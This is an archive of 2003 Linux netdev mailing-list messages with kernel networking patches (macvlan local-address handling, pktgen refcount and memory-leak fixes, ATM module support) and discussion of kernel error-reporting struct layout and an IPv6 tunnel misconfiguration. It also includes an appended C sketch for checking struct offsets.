/* Set macvlan options */ + /* Driver configuration calls */ #define SIOCGIFMAP 0x8970 /* Get device parameters */ 
@@ -114,6 +120,16 @@ #define SIOCBONDINFOQUERY 0x8994 /* rtn info about bond state */ #define SIOCBONDCHANGEACTIVE 0x8995 /* update to a new active slave */ + +/* Ben's little hack land */ +#define SIOCSACCEPTLOCALADDRS 0x89a0 /* Allow interfaces to accept pkts from + * local interfaces...use with SO_BINDTODEVICE + */ +#define SIOCGACCEPTLOCALADDRS 0x89a1 /* Allow interfaces to accept pkts from + * local interfaces...use with SO_BINDTODEVICE + */ + + /* Device private ioctl calls */ /* --- linux-2.4.20/net/Config.in 2002-08-02 17:39:46.000000000 -0700 +++ linux-2.4.20.c3/net/Config.in 2003-03-18 14:32:53.000000000 -0800 @@ -48,6 +48,7 @@ bool ' Per-VC IP filter kludge' CONFIG_ATM_BR2684_IPFILTER fi fi + tristate 'MAC address based VLANs (EXPERIMENTAL)' CONFIG_MACVLAN fi tristate '802.1Q VLAN Support' CONFIG_VLAN_8021Q --- linux-2.4.20/net/ipv4/arp.c 2002-11-28 15:53:15.000000000 -0800 +++ linux-2.4.20.c3/net/ipv4/arp.c 2003-03-18 14:32:53.000000000 -0800 @@ -1,4 +1,4 @@ -/* linux/net/inet/arp.c +/* linux/net/inet/arp.c -*-linux-c-*- * * Version: $Id: arp.c,v 1.99 2001/08/30 22:55:42 davem Exp $ * @@ -351,12 +351,22 @@ int flag = 0; /*unsigned long now; */ - if (ip_route_output(&rt, sip, tip, 0, 0) < 0) + if (ip_route_output(&rt, sip, tip, 0, 0) < 0) return 1; - if (rt->u.dst.dev != dev) { - NET_INC_STATS_BH(ArpFilter); - flag = 1; - } + + if (rt->u.dst.dev != dev) { + if ((dev->priv_flags & IFF_ACCEPT_LOCAL_ADDRS) && + (rt->u.dst.dev == &loopback_dev)) { + /* OK, we'll let this special case slide, so that we can arp from one + * local interface to another. This seems to work, but could use some + * review. 
--Ben + */ + } + else { + NET_INC_STATS_BH(ArpFilter); + flag = 1; + } + } ip_rt_put(rt); return flag; } --- linux-2.4.20/net/ipv4/fib_frontend.c 2002-08-02 17:39:46.000000000 -0700 +++ linux-2.4.20.c3/net/ipv4/fib_frontend.c 2003-03-18 14:32:53.000000000 -0800 @@ -233,8 +233,17 @@ if (fib_lookup(&key, &res)) goto last_resort; - if (res.type != RTN_UNICAST) - goto e_inval_res; + + if (res.type != RTN_UNICAST) { + if ((res.type == RTN_LOCAL) && + (dev->priv_flags & IFF_ACCEPT_LOCAL_ADDRS)) { + /* All is OK */ + } + else { + goto e_inval_res; + } + } + *spec_dst = FIB_RES_PREFSRC(res); fib_combine_itag(itag, &res); #ifdef CONFIG_IP_ROUTE_MULTIPATH --- linux-2.4.20/net/ipv4/tcp_ipv4.c 2002-11-28 15:53:15.000000000 -0800 +++ linux-2.4.20.c3/net/ipv4/tcp_ipv4.c 2003-03-18 14:32:53.000000000 -0800 @@ -1394,7 +1394,7 @@ #define want_cookie 0 /* Argh, why doesn't gcc optimize this :( */ #endif - /* Never answer to SYNs send to broadcast or multicast */ + /* Never answer to SYNs sent to broadcast or multicast */ if (((struct rtable *)skb->dst)->rt_flags & (RTCF_BROADCAST|RTCF_MULTICAST)) goto drop; --------------010705080708070503070404-- From jgarzik@pobox.com Thu Jul 10 10:41:17 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 10:41:28 -0700 (PDT) Received: from www.linux.org.uk (IDENT:Mo2Lx2VdagYDMQtvx4rrVSKZS3WvJFNh@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AHfF2x015545 for ; Thu, 10 Jul 2003 10:41:17 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19afPu-00015K-99 for netdev@oss.sgi.com; Thu, 10 Jul 2003 18:41:14 +0100 Message-ID: <3F0DA525.2080808@pobox.com> Date: Thu, 10 Jul 2003 13:40:53 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: Maillist netdev Subject: [Fwd: PATCH pktgen hang, 
memleak, fixes] Content-Type: multipart/mixed; boundary="------------010608040006050807000806" X-archive-position: 3906 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev This is a multi-part message in MIME format. --------------010608040006050807000806 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit --------------010608040006050807000806 Content-Type: message/rfc822; name="PATCH pktgen hang, memleak, fixes" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="PATCH pktgen hang, memleak, fixes" Return-Path: Delivered-To: garzik@gtf.org Received: from puzzle.pobox.com (puzzle.pobox.com [207.106.49.20]) by havoc.gtf.org (Postfix) with ESMTP id 7E495665C for ; Thu, 10 Jul 2003 11:27:15 -0400 (EDT) Received: from puzzle.pobox.com (localhost [127.0.0.1]) by puzzle.pobox.com (Postfix) with ESMTP id E4B9426C011 for ; Thu, 10 Jul 2003 11:27:14 -0400 (EDT) Delivered-To: jgarzik@pobox.com Received: from vger.kernel.org (vger.kernel.org [209.116.70.75]) by puzzle.pobox.com (Postfix) with ESMTP id C3B2526C124 for ; Thu, 10 Jul 2003 11:27:14 -0400 (EDT) Received: (majordomo@vger.kernel.org) by vger.kernel.org via listexpand id S269321AbTGJPHs (ORCPT ); Thu, 10 Jul 2003 11:07:48 -0400 Received: (majordomo@vger.kernel.org) by vger.kernel.org id S269324AbTGJPHr (ORCPT ); Thu, 10 Jul 2003 11:07:47 -0400 Received: from sea2-f47.sea2.hotmail.com ([207.68.165.47]:64013 "EHLO hotmail.com") by vger.kernel.org with ESMTP id S269321AbTGJPHp (ORCPT ); Thu, 10 Jul 2003 11:07:45 -0400 Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Thu, 10 Jul 2003 08:22:25 -0700 Received: from 63.173.114.243 by sea2fd.sea2.hotmail.msn.com with HTTP; Thu, 10 Jul 2003 15:22:24 GMT X-Originating-IP: [63.173.114.243] X-Originating-Email: [kambo77@hotmail.com] From: "Kambo Lohan" To: 
linux-kernel@vger.kernel.org Subject: PATCH pktgen hang, memleak, fixes Date: Thu, 10 Jul 2003 11:22:24 -0400 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 10 Jul 2003 15:22:25.0186 (UTC) FILETIME=[10F4F020:01C346F7] Sender: linux-kernel-owner@vger.kernel.org Precedence: bulk X-Mailing-List: linux-kernel@vger.kernel.org X-Spam-Status: No, hits=-4.7 required=7.0 tests=AWL,BAYES_10,FROM_ENDS_IN_NUMS,PATCH_UNIFIED_DIFF, X_MAILING_LIST version=2.55 X-Spam-Level: X-Spam-Checker-Version: SpamAssassin 2.55 (1.174.2.19-2003-05-19-exp) This should fix about 3 things. My first patch, be gentle... 2.5 has the same problem but I do not know if this will apply or not, we run 2.4. >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> --- linux-2.4.21/net/core/pktgen.c 2002-11-28 18:53:15.000000000 -0500 +++ linux-2.4-kjp/net/core/pktgen.c 2003-07-10 11:08:31.000000000 -0400 @@ -34,6 +34,7 @@ * * The new changes seem to have a performance impact of around 1%, * as far as I can tell. * --Ben Greear + * Fix refcount off by one if first packet fails, potential null deref, memleak 030710- KJP * * Renamed multiskb to clone_skb and cleaned up sending core for two distinct * skb modes. 
A clone_skb=0 mode for Ben "ranges" work and a clone_skb != 0 @@ -84,9 +85,9 @@ #define cycles() ((u32)get_cycles()) -#define VERSION "pktgen version 1.2" +#define VERSION "pktgen version 1.2.1" static char version[] __initdata = - "pktgen.c: v1.2: Packet Generator for packet performance testing.\n"; + "pktgen.c: v1.2.1: Packet Generator for packet performance testing.\n"; /* Used to help with determining the pkts on receive */ @@ -613,12 +614,11 @@ kfree_skb(skb); skb = fill_packet(odev, info); if (skb == NULL) { - break; + goto out_reldev; } fp++; fp_tmp = 0; /* reset counter */ } - atomic_inc(&skb->users); } nr_frags = skb_shinfo(skb)->nr_frags; @@ -634,9 +634,10 @@ last_ok = 0; } else { - last_ok = 1; - info->sofar++; - info->seq_num++; + atomic_inc(&skb->users); + last_ok = 1; + info->sofar++; + info->seq_num++; } } else { @@ -707,6 +708,7 @@ } }/* while we should be running */ + do_gettimeofday(&(info->stopped_at)); total = (info->stopped_at.tv_sec - info->started_at.tv_sec) * 1000000 + @@ -731,6 +733,8 @@ (unsigned long long) info->errors ); } + + kfree_skb(skb); out_reldev: if (odev) { _________________________________________________________________ STOP MORE SPAM with the new MSN 8 and get 2 months FREE* http://join.msn.com/?page=features/junkmail - To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html Please read the FAQ at http://www.tux.org/lkml/ --------------010608040006050807000806-- From yoshfuji@wide.ad.jp Thu Jul 10 11:05:52 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 11:05:57 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AI5o2x016014 for ; Thu, 10 Jul 2003 11:05:51 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id 
h6AI7NBo001866 for ; Fri, 11 Jul 2003 03:07:23 +0900 Resent-Date: Fri, 11 Jul 2003 03:07:23 +0900 (JST) Resent-Message-Id: <20030711.030723.108590257.yoshfuji@wide.ad.jp> Resent-To: netdev@oss.sgi.com Resent-From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= X-Originating-IP: [63.173.114.243] X-Originating-Email: [kambo77@hotmail.com] From: "Kambo Lohan" To: linux-kernel@vger.kernel.org Cc: robert.olsson@its.uu.se Subject: [PATCH] [UPDATED] pktgen fixes .... Date: Thu, 10 Jul 2003 13:40:04 -0400 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 10 Jul 2003 17:40:05.0049 (UTC) FILETIME=[4C380290:01C3470A] Precedence: bulk X-Mailing-List: linux-kernel@vger.kernel.org X-archive-position: 3907 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@wide.ad.jp Precedence: bulk X-list: netdev That last fix was bad... the skb->users refcount change made it possible for the skb to get double freed as skb->users was only incremented from one immediately after calling dev_hard_xmit, this should address that I hope. I now see thats what the old code was trying to avoid, but the old way fails if the first packet attempted failed dev_hard_xmit. So it needs a fix somehow. I am testing this by looping a script that starts pktgen with count=10000 and clone_skb=100. Making sure it does not soft hang (requiring a control c) or cause mem leaks. Here is the updated patch. >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> --- linux-2.4.21/net/core/pktgen.c 2002-11-28 18:53:15.000000000 -0500 +++ linux-2.4-kjp/net/core/pktgen.c 2003-07-10 13:22:17.000000000 -0400 @@ -34,6 +34,7 @@ * * The new changes seem to have a performance impact of around 1%, * as far as I can tell. 
* --Ben Greear + * Fix refcount off by one if first packet fails, potential null deref, memleak 030710- KJP * * Renamed multiskb to clone_skb and cleaned up sending core for two distinct * skb modes. A clone_skb=0 mode for Ben "ranges" work and a clone_skb != 0 @@ -84,9 +85,9 @@ #define cycles() ((u32)get_cycles()) -#define VERSION "pktgen version 1.2" +#define VERSION "pktgen version 1.2.1" static char version[] __initdata = - "pktgen.c: v1.2: Packet Generator for packet performance testing.\n"; + "pktgen.c: v1.2.1: Packet Generator for packet performance testing.\n"; /* Used to help with determining the pkts on receive */ @@ -613,12 +614,11 @@ kfree_skb(skb); skb = fill_packet(odev, info); if (skb == NULL) { - break; + goto out_reldev; } fp++; fp_tmp = 0; /* reset counter */ } - atomic_inc(&skb->users); } nr_frags = skb_shinfo(skb)->nr_frags; @@ -626,7 +626,9 @@ spin_lock_bh(&odev->xmit_lock); if (!netif_queue_stopped(odev)) { + atomic_inc(&skb->users); if (odev->hard_start_xmit(skb, odev)) { + atomic_dec(&skb->users); if (net_ratelimit()) { printk(KERN_INFO "Hard xmit error\n"); } @@ -634,9 +636,9 @@ last_ok = 0; } else { - last_ok = 1; - info->sofar++; - info->seq_num++; + last_ok = 1; + info->sofar++; + info->seq_num++; } } else { @@ -731,6 +733,8 @@ (unsigned long long) info->errors ); } + + kfree_skb(skb); out_reldev: if (odev) { _________________________________________________________________ MSN 8 with e-mail virus protection service: 2 months FREE* http://join.msn.com/?page=features/virus - To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html Please read the FAQ at http://www.tux.org/lkml/ From jkenisto@us.ibm.com Thu Jul 10 12:11:35 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 12:12:12 -0700 (PDT) Received: from e4.ny.us.ibm.com (e4.ny.us.ibm.com [32.97.182.104]) by oss.sgi.com (8.12.9/8.12.9) 
with SMTP id h6AJAl2x016937 for ; Thu, 10 Jul 2003 12:11:34 -0700 Received: from northrelay04.pok.ibm.com (northrelay04.pok.ibm.com [9.56.224.206]) by e4.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6AJAHjR117610; Thu, 10 Jul 2003 15:10:17 -0400 Received: from us.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay04.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6AJADDQ040704; Thu, 10 Jul 2003 15:10:14 -0400 Message-ID: <3F0DB9A5.23723BE1@us.ibm.com> Date: Thu, 10 Jul 2003 12:08:21 -0700 From: Jim Keniston X-Mailer: Mozilla 4.75 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: James Morris CC: LKML , netdev@oss.sgi.com, Andrew Morton , "David S. Miller" , Jeff Garzik , Alan Cox , Randy Dunlap Subject: Re: [PATCH - RFC] [1/2] 2.6 must-fix list - kernel error reporting References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3908 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jkenisto@us.ibm.com Precedence: bulk X-list: netdev James Morris wrote: > > On Tue, 8 Jul 2003, Jim Keniston wrote: > > + kerror_nl = netlink_kernel_create(NETLINK_KERROR, kerror_netlink_rcv); > + if (kerror_nl == NULL) > + panic("kerror_init: cannot initialize kerror_nl\n"); > > You can simply use NULL instead of passing the dummy kerror_netlink_rcv > function. That begs the question: do we trust that nobody but the kernel will send packets to a NETLINK_KERROR socket? Ordinary users can't, but any root application can. Without kerror_netlink_rcv(), such packets don't get dequeued. > > +struct kern_log_entry { > + __u16 log_kmagic; /* always LOGREC_KMAGIC */ > + __u16 log_kversion; /* which version of this struct? */ > + char log_facility[FACILITY_MAXLEN]; /* e.g., driver name */ > > These fields should generally be specified in ascending order to help with > alignment. We include log_kmagic and log_kversion so the receiving app (e.g. 
the evlog daemon) can figure out which version of the kernel header it's
getting. Note that we're up to #3 (going on #4, with the changes you and
others have suggested). As long as we have to include log_kmagic and
log_kversion, they need to be first.

That said, I get the impression that people would be more comfortable if
log_facility[] were moved to the end.

Other than that, can anybody point out a specific area where there's likely
to be an alignment problem? The various members' offsets are the same on
i386, ppc32, and ppc64. This should also be true for s390 and s390x. I'd
think it'd really matter only when kernel and user on the same system are
different architectures. ppc64K/ppc32U, at least, works.

>
> It may also be worth looking at how the ULOG code batches messages to
> improve performance.

Thanks for the pointer. Looks nice. If performance turns out to be an issue
(e.g., if for some reason people want to cc all printk messages through this
interface), I'll keep that in mind.

>
> - James
> --
> James Morris
>

Jim K.
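
For anyone who wants to check the offsets claim on their own architecture,
a small userspace program is probably the quickest way. What follows is only
a minimal sketch under stated assumptions: FACILITY_MAXLEN is set to 16 here
as a hypothetical value (the real one is not given in this thread), uint16_t
stands in for the kernel's __u16, and only the three members quoted above are
modeled. The struct and function names are made up for illustration.

```c
#include <assert.h>   /* assert */
#include <stddef.h>   /* offsetof */
#include <stdint.h>   /* uint16_t */
#include <stdio.h>    /* printf */

/* Hypothetical value; the real FACILITY_MAXLEN is not shown in this thread. */
#define FACILITY_MAXLEN 16

/*
 * Userspace stand-in for the first three members of kern_log_entry as
 * quoted above. Any later members of the real struct are omitted.
 */
struct kern_log_entry_sketch {
	uint16_t log_kmagic;                    /* magic number, must come first */
	uint16_t log_kversion;                  /* struct version, must come second */
	char     log_facility[FACILITY_MAXLEN]; /* e.g., driver name */
};

/*
 * Returns 1 if the two 16-bit header fields sit at offsets 0 and 2 and
 * the facility name starts right after them at offset 4, else 0.
 */
int kle_header_layout_ok(void)
{
	return offsetof(struct kern_log_entry_sketch, log_kmagic) == 0 &&
	       offsetof(struct kern_log_entry_sketch, log_kversion) == 2 &&
	       offsetof(struct kern_log_entry_sketch, log_facility) == 4;
}

/* Prints each member's offset so layouts can be compared across builds. */
void kle_print_layout(void)
{
	assert(kle_header_layout_ok());
	printf("log_kmagic   @ %zu\n",
	       offsetof(struct kern_log_entry_sketch, log_kmagic));
	printf("log_kversion @ %zu\n",
	       offsetof(struct kern_log_entry_sketch, log_kversion));
	printf("log_facility @ %zu\n",
	       offsetof(struct kern_log_entry_sketch, log_facility));
}
```

Calling kle_print_layout() from main() on each target (and on both sides of a
mixed setup such as a 64-bit kernel with 32-bit userspace) and comparing the
output would show whether the members line up. Extending the sketch with the
remaining members of the real struct is where a mismatch, if any, would be
expected to appear.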
From mika.penttila@kolumbus.fi Thu Jul 10 12:51:49 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 12:52:26 -0700 (PDT) Received: from notes.hallinto.turkuamk.fi (notes.hallinto.turkuamk.fi [195.148.215.149]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AJp62x020117 for ; Thu, 10 Jul 2003 12:51:48 -0700 Received: from kolumbus.fi ([193.166.244.70]) by marconi.hallinto.turkuamk.fi (Lotus Domino Release 5.0.8) with ESMTP id 2003071022522130:19785 ; Thu, 10 Jul 2003 22:52:21 +0300 Message-ID: <3F0DC518.3010301@kolumbus.fi> Date: Thu, 10 Jul 2003 22:57:12 +0300 From: =?ISO-8859-1?Q?Mika_Penttil=E4?= User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02 X-Accept-Language: en-us, en MIME-Version: 1.0 To: =?ISO-8859-1?Q?YOSHIFUJI_Hideaki_/_=3F=3F=3F=3F?= CC: cat@zip.com.au, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, pekkas@netcore.fi Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked References: <20030710154302.GE1722@zip.com.au> <20030711.005542.04973601.yoshfuji@linux-ipv6.org> X-MIMETrack: Itemize by SMTP Server on marconi.hallinto.turkuamk.fi/TAMK(Release 5.0.8 |June 18, 2001) at 10.07.2003 22:52:21, Serialize by Router on notes.hallinto.turkuamk.fi/TAMK(Release 5.0.10 |March 22, 2002) at 10.07.2003 22:52:34, Serialize complete at 10.07.2003 22:52:34 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=us-ascii; format=flowed X-archive-position: 3909 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.penttila@kolumbus.fi Precedence: bulk X-list: netdev But 3ffe:8001:000c:ffff::36 is _not_ subnet routers anycast address. Anyway, looks like a bug to me... --Mika YOSHIFUJI Hideaki / ???? wrote: >In article <20030710154302.GE1722@zip.com.au> (at Fri, 11 Jul 2003 01:43:03 +1000), CaT says: > > > >>With 2.4.21-pre2 I can get a nice tunnel going over my ppp connection >>and as such get ipv6 connectivity. 
I think went to 2.4.21 and then to >>2.4.22-pre4 and bringing up the tunnel fails as follows: >> >> >: > > >>ip addr add 3ffe:8001:000c:ffff::37/127 dev sit1 >> ip route add ::/0 via 3ffe:8001:000c:ffff::36 >>RTNETLINK answers: Invalid argument >> >> > >This is not bug, but rather misconfiguration; >you cannot use prefix::, which is mandatory subnet routers >anycast address, as unicast address. > >Thank you. > > > From chas@locutus.cmf.nrl.navy.mil Thu Jul 10 13:34:48 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 13:35:25 -0700 (PDT) Received: from ginger.cmf.nrl.navy.mil (ginger.cmf.nrl.navy.mil [134.207.10.161]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AKY72x021414 for ; Thu, 10 Jul 2003 13:34:48 -0700 Received: from locutus.cmf.nrl.navy.mil (locutus.cmf.nrl.navy.mil [134.207.10.66]) by ginger.cmf.nrl.navy.mil (8.12.7/8.12.7) with ESMTP id h6AKXtsG006493; Thu, 10 Jul 2003 16:33:55 -0400 (EDT) Message-Id: <200307102033.h6AKXtsG006493@ginger.cmf.nrl.navy.mil> To: davem@redhat.com cc: netdev@oss.sgi.com Subject: [PATCH][2.4] more atm changes backported to 2.4 Reply-To: chas3@users.sourceforge.net Date: Thu, 10 Jul 2003 16:31:32 -0400 From: chas williams X-Spam-Score: () hits=0.5 X-Virus-Scanned: NAI Completed X-Scanned-By: MIMEDefang 2.30 (www . roaringpenguin . com / mimedefang) X-archive-position: 3910 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: chas@cmf.nrl.navy.mil Precedence: bulk X-list: netdev [atm]: make atm buildable as a module # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. 
# This patch includes the following deltas: # ChangeSet 1.1013 -> 1.1014 # net/sched/Config.in 1.3 -> 1.4 # arch/cris/config.in 1.13 -> 1.13.1.1 # drivers/net/Config.in 1.62 -> 1.63 # arch/sparc/config.in 1.14 -> 1.14.1.1 # net/atm/Makefile 1.5 -> 1.6 # net/Config.in 1.11 -> 1.12 # arch/alpha/config.in 1.22.1.1 -> 1.22.1.2 # arch/ppc64/config.in 1.6 -> 1.6.1.1 # net/atm/proc.c 1.7 -> 1.8 # net/atm/pvc.c 1.3 -> 1.4 # arch/sparc64/config.in 1.25 -> 1.25.1.1 # arch/i386/config.in 1.42 -> 1.42.1.1 # include/linux/net.h 1.2 -> 1.3 # net/netsyms.c 1.36 -> 1.37 # arch/sh/config.in 1.8 -> 1.8.1.1 # arch/ia64/config.in 1.17 -> 1.17.1.1 # arch/ppc/config.in 1.36 -> 1.36.1.1 # net/atm/svc.c 1.3 -> 1.4 # arch/x86_64/config.in 1.4 -> 1.4.1.1 # net/atm/common.h 1.1 -> 1.2 # drivers/atm/Config.in 1.7 -> 1.8 # arch/parisc/config.in 1.5 -> 1.5.1.1 # net/atm/common.c 1.16 -> 1.17 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/06/27 chas@relax.cmf.nrl.navy.mil 1.1014 # make atm buildable as a module # -------------------------------------------- # diff -Nru a/arch/alpha/config.in b/arch/alpha/config.in --- a/arch/alpha/config.in Mon Jun 30 13:22:50 2003 +++ b/arch/alpha/config.in Mon Jun 30 13:22:50 2003 @@ -367,7 +367,7 @@ bool 'Network device support' CONFIG_NETDEVICES if [ "$CONFIG_NETDEVICES" = "y" ]; then source drivers/net/Config.in - if [ "$CONFIG_ATM" = "y" ]; then + if [ "$CONFIG_ATM" != "n" ]; then source drivers/atm/Config.in fi fi diff -Nru a/arch/cris/config.in b/arch/cris/config.in --- a/arch/cris/config.in Mon Jun 30 13:22:50 2003 +++ b/arch/cris/config.in Mon Jun 30 13:22:50 2003 @@ -199,7 +199,7 @@ bool 'Network device support' CONFIG_NETDEVICES if [ "$CONFIG_NETDEVICES" = "y" ]; then source drivers/net/Config.in - if [ "$CONFIG_ATM" = "y" ]; then + if [ "$CONFIG_ATM" != "n" ]; then source drivers/atm/Config.in fi fi diff -Nru a/arch/i386/config.in b/arch/i386/config.in --- a/arch/i386/config.in Mon Jun 30 
13:22:50 2003 +++ b/arch/i386/config.in Mon Jun 30 13:22:50 2003 @@ -393,7 +393,7 @@ bool 'Network device support' CONFIG_NETDEVICES if [ "$CONFIG_NETDEVICES" = "y" ]; then source drivers/net/Config.in - if [ "$CONFIG_ATM" = "y" ]; then + if [ "$CONFIG_ATM" != "n" ]; then source drivers/atm/Config.in fi fi diff -Nru a/arch/ia64/config.in b/arch/ia64/config.in --- a/arch/ia64/config.in Mon Jun 30 13:22:50 2003 +++ b/arch/ia64/config.in Mon Jun 30 13:22:50 2003 @@ -179,7 +179,7 @@ bool 'Network device support' CONFIG_NETDEVICES if [ "$CONFIG_NETDEVICES" = "y" ]; then source drivers/net/Config.in - if [ "$CONFIG_ATM" = "y" ]; then + if [ "$CONFIG_ATM" != "n" ]; then source drivers/atm/Config.in fi fi diff -Nru a/arch/parisc/config.in b/arch/parisc/config.in --- a/arch/parisc/config.in Mon Jun 30 13:22:50 2003 +++ b/arch/parisc/config.in Mon Jun 30 13:22:50 2003 @@ -136,7 +136,7 @@ if [ "$CONFIG_NETDEVICES" = "y" ]; then source drivers/net/Config.in - if [ "$CONFIG_ATM" = "y" ]; then + if [ "$CONFIG_ATM" != "n" ]; then source drivers/atm/Config.in fi fi diff -Nru a/arch/ppc/config.in b/arch/ppc/config.in --- a/arch/ppc/config.in Mon Jun 30 13:22:50 2003 +++ b/arch/ppc/config.in Mon Jun 30 13:22:50 2003 @@ -324,7 +324,7 @@ bool 'Network device support' CONFIG_NETDEVICES if [ "$CONFIG_NETDEVICES" = "y" ]; then source drivers/net/Config.in - if [ "$CONFIG_ATM" = "y" ]; then + if [ "$CONFIG_ATM" != "n" ]; then source drivers/atm/Config.in fi fi diff -Nru a/arch/ppc64/config.in b/arch/ppc64/config.in --- a/arch/ppc64/config.in Mon Jun 30 13:22:50 2003 +++ b/arch/ppc64/config.in Mon Jun 30 13:22:50 2003 @@ -141,7 +141,7 @@ bool 'Network device support' CONFIG_NETDEVICES if [ "$CONFIG_NETDEVICES" = "y" ]; then source drivers/net/Config.in - if [ "$CONFIG_ATM" = "y" ]; then + if [ "$CONFIG_ATM" != "n" ]; then source drivers/atm/Config.in fi fi diff -Nru a/arch/sh/config.in b/arch/sh/config.in --- a/arch/sh/config.in Mon Jun 30 13:22:50 2003 +++ b/arch/sh/config.in Mon Jun 30 
13:22:50 2003 @@ -259,7 +259,7 @@ bool 'Network device support' CONFIG_NETDEVICES if [ "$CONFIG_NETDEVICES" = "y" ]; then source drivers/net/Config.in - if [ "$CONFIG_ATM" = "y" ]; then + if [ "$CONFIG_ATM" != "n" ]; then source drivers/atm/Config.in fi fi diff -Nru a/arch/sparc/config.in b/arch/sparc/config.in --- a/arch/sparc/config.in Mon Jun 30 13:22:50 2003 +++ b/arch/sparc/config.in Mon Jun 30 13:22:50 2003 @@ -209,7 +209,7 @@ dep_tristate ' PPP BSD-Compress compression' CONFIG_PPP_BSDCOMP m if [ "$CONFIG_EXPERIMENTAL" = "y" ]; then dep_tristate ' PPP over Ethernet (EXPERIMENTAL)' CONFIG_PPPOE $CONFIG_PPP - if [ "$CONFIG_ATM" = "y" ]; then + if [ "$CONFIG_ATM" != "n" ]; then dep_tristate ' PPP over ATM (EXPERIMENTAL)' CONFIG_PPPOATM $CONFIG_PPP fi fi @@ -235,7 +235,7 @@ # if [ "$CONFIG_FDDI" = "y" ]; then # fi - if [ "$CONFIG_ATM" = "y" ]; then + if [ "$CONFIG_ATM" != "n" ]; then source drivers/atm/Config.in fi fi diff -Nru a/arch/sparc64/config.in b/arch/sparc64/config.in --- a/arch/sparc64/config.in Mon Jun 30 13:22:50 2003 +++ b/arch/sparc64/config.in Mon Jun 30 13:22:50 2003 @@ -234,7 +234,7 @@ bool 'Network device support' CONFIG_NETDEVICES if [ "$CONFIG_NETDEVICES" = "y" ]; then source drivers/net/Config.in - if [ "$CONFIG_ATM" = "y" ]; then + if [ "$CONFIG_ATM" != "n" ]; then source drivers/atm/Config.in fi fi diff -Nru a/arch/x86_64/config.in b/arch/x86_64/config.in --- a/arch/x86_64/config.in Mon Jun 30 13:22:50 2003 +++ b/arch/x86_64/config.in Mon Jun 30 13:22:50 2003 @@ -173,7 +173,7 @@ if [ "$CONFIG_NETDEVICES" = "y" ]; then source drivers/net/Config.in # seems to be largely not 64bit safe -# if [ "$CONFIG_ATM" = "y" ]; then +# if [ "$CONFIG_ATM" != "n" ]; then # source drivers/atm/Config.in # fi fi diff -Nru a/drivers/atm/Config.in b/drivers/atm/Config.in --- a/drivers/atm/Config.in Mon Jun 30 13:22:50 2003 +++ b/drivers/atm/Config.in Mon Jun 30 13:22:50 2003 @@ -4,11 +4,11 @@ mainmenu_option next_comment comment 'ATM drivers' if [ "$CONFIG_INET" 
